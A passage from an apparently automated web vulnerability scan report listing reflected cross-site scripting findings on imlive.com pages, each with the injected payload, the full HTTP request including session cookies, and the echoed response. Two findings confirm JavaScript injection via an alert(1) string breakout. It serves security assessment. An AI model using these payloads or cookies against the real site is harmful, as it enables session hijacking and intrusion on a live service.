This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /localcompanionship.asp?d9f12'><a>f87a2832891=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:12 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:12 GMT
Connection: close
Content-Length: 16579
Vary: Accept-Encoding


<html>
   <head>
       <title>Friends & Romance on Webcam Video Chat at ImLive</title>
       <meta name="description" content="Like shopping? Go out to restaurants? Find your soul mate on live webcam vid
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/localcompanionship.asp?d9f12'><a>f87a2832891=1&lr=1107816009&ud=0&pe=localcompanionship.asp&qs=d9f12'>
...[SNIP]...

2.125. http://imlive.com/minglesingles.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /minglesingles.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1a452'><a>a6955adbf25 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /minglesingles.asp?1a452'><a>a6955adbf25=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:10 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:10 GMT
Connection: close
Content-Length: 16143
Vary: Accept-Encoding


<html>
   <head>
       <title>Mingle With Friends on Live Webcam Video Chat at ImLive</title>
       <meta name="description" content="Mingle with Singles on live webcam video chat - Find a match and go on
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/minglesingles.asp?1a452'><a>a6955adbf25=1&lr=1107816009&ud=0&pe=minglesingles.asp&qs=1a452'>
...[SNIP]...

2.126. http://imlive.com/pr.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /pr.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 90148'><a>2e9c3e6d159 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /pr.asp?90148'><a>2e9c3e6d159=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:18 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:18 GMT
Connection: close
Content-Length: 9886
Vary: Accept-Encoding


<!--include file="help/CustomerServiceEmails.inc"-->

<html>
   <head>
       <title>Public Relations of ImLive Video Chat</title>
       
<link rel="stylesheet" type="text/css" href="http://i1.imlive.com
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/pr.asp?90148'><a>2e9c3e6d159=1&lr=1107816009&ud=0&pe=pr.asp&qs=90148'>
...[SNIP]...

2.127. http://imlive.com/preparesearch.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /preparesearch.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad584"><a>5bd7ab7e3b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /preparesearch.asp?ad584"><a>5bd7ab7e3b0=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0aL3siby47TA1QT7oGe%2b8%2b0HFAu%2bfqcO77Lbk%2bAmjH%2bK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:33 GMT
Connection: close
Content-Length: 19415
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/preparesearch.aspx?ad584"><a>5bd7ab7e3b0=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

2.128. http://imlive.com/preparesearch.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /preparesearch.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1cf17'-alert(1)-'f7758fd0154 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /preparesearch.asp?1cf17'-alert(1)-'f7758fd0154=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0aL3siby47TA1QT7oGe%2b8%2b0HFAu%2bfqcO77Lbk%2bAmjH%2bK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:57 GMT
Connection: close
Content-Length: 19576
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/preparesearch.aspx&he=imlive.com&ul=/preparesearch.aspx?1cf17'-alert(1)-'f7758fd0154=1&qs=1cf17'-alert(1)-'f7758fd0154=1&qs=1cf17'-alert(1)-'f7758fd0154=1&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function
...[SNIP]...

2.129. http://imlive.com/preparesearch.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /preparesearch.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aed33"><a>4a10453e31b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /preparesearch.aspx?aed33"><a>4a10453e31b=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:56 GMT
Connection: close
Content-Length: 19417
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/preparesearch.aspx?aed33"><a>4a10453e31b=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

2.130. http://imlive.com/preparesearch.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /preparesearch.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ac9b'-alert(1)-'0d66f31204c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /preparesearch.aspx?8ac9b'-alert(1)-'0d66f31204c=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:25:00 GMT
Connection: close
Content-Length: 19578
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/preparesearch.aspx&he=imlive.com&ul=/preparesearch.aspx?8ac9b'-alert(1)-'0d66f31204c=1&qs=8ac9b'-alert(1)-'0d66f31204c=1&qs=8ac9b'-alert(1)-'0d66f31204c=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function
...[SNIP]...

2.131. http://imlive.com/sitemap.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /sitemap.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1979b'><a>18155b4088b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sitemap.html?1979b'><a>18155b4088b=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:24:32 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2FSf8bs6wRlvXx1sFag%3D%3D; path=/
Set-Cookie: ix=k; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:32 GMT
Connection: close
Content-Length: 33756
Vary: Accept-Encoding


<html>
<head>
<meta name="keywords" content="live Video Chat, Video Chat live, Video Chat live, live Video Chat, webcam chat, live web cam, webcam live, live webcam, web cam live, web cam communti
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/sitemap.html?1979b'><a>18155b4088b=1&lr=1107816008&ud=0&pe=sitemap.asp&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

2.132. http://imlive.com/videosfr.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /videosfr.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f44ce'><a>23f9fd95641 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videosfr.asp?f44ce'><a>23f9fd95641=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:12 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:13 GMT
Connection: close
Content-Length: 15757
Vary: Accept-Encoding


<html>
   <head>
       <title>Video Chat Recorded on Webcam at ImLive</title>
       <meta name="description" content="Come in and discover what our hosts have recorded in Friends & Romance live webcam vide
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/videosfr.asp?f44ce'><a>23f9fd95641=1&lr=1107816009&ud=0&pe=videosfr.asp&qs=f44ce'>
...[SNIP]...

2.133. http://imlive.com/warningjx.aspx [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /warningjx.aspx

Issue detail

